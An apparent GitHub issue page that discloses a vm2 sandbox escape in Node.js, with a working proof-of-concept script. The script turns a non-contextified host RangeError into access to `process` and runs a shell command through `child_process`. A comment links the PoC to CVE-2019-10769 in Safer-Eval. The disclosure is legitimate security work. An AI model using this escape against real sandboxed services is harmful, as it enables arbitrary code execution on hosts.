You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
It is possible to almost anywhere generate a RangeError: Maximum call stack size exceeded. Sometimes the RangeError will be a host RangeError which is not Contextified.
I tried to make the code as stable as possible.
"use strict";const{VM}=require('vm2');constuntrusted=`const f = Buffer.prototype.write;const ft = { length: 10, utf8Write(){ }}function r(i){ var x = 0; try{ x = r(i); }catch(e){} if(typeof(x)!=='number') return x; if(x!==i) return x+1; try{ f.call(ft); }catch(e){ return e; } return null;}var i=1;while(1){ try{ i=r(i).constructor.constructor("return process")(); break; }catch(x){ i++; }}i.mainModule.require("child_process").execSync("whoami").toString()`;try{console.log(newVM().run(untrusted));}catch(x){console.log(x);}
I used 11.8.0.
The text was updated successfully, but these errors were encountered:
@XmiliaH Just a heads up, your POC worked against another project as well called Safer-Eval and had the following CVE number assigned to it: CVE-2019-10769. Nice finding!
You can break out far easier commenthol/safer-eval#10. And to get a host exceptions one can just supply a invalid argument to get a exception. Using maximum call stack RangeError is overkill.
It is possible to almost anywhere generate a RangeError: Maximum call stack size exceeded. Sometimes the RangeError will be a host RangeError which is not Contextified.
I tried to make the code as stable as possible.
I used 11.8.0.
The text was updated successfully, but these errors were encountered: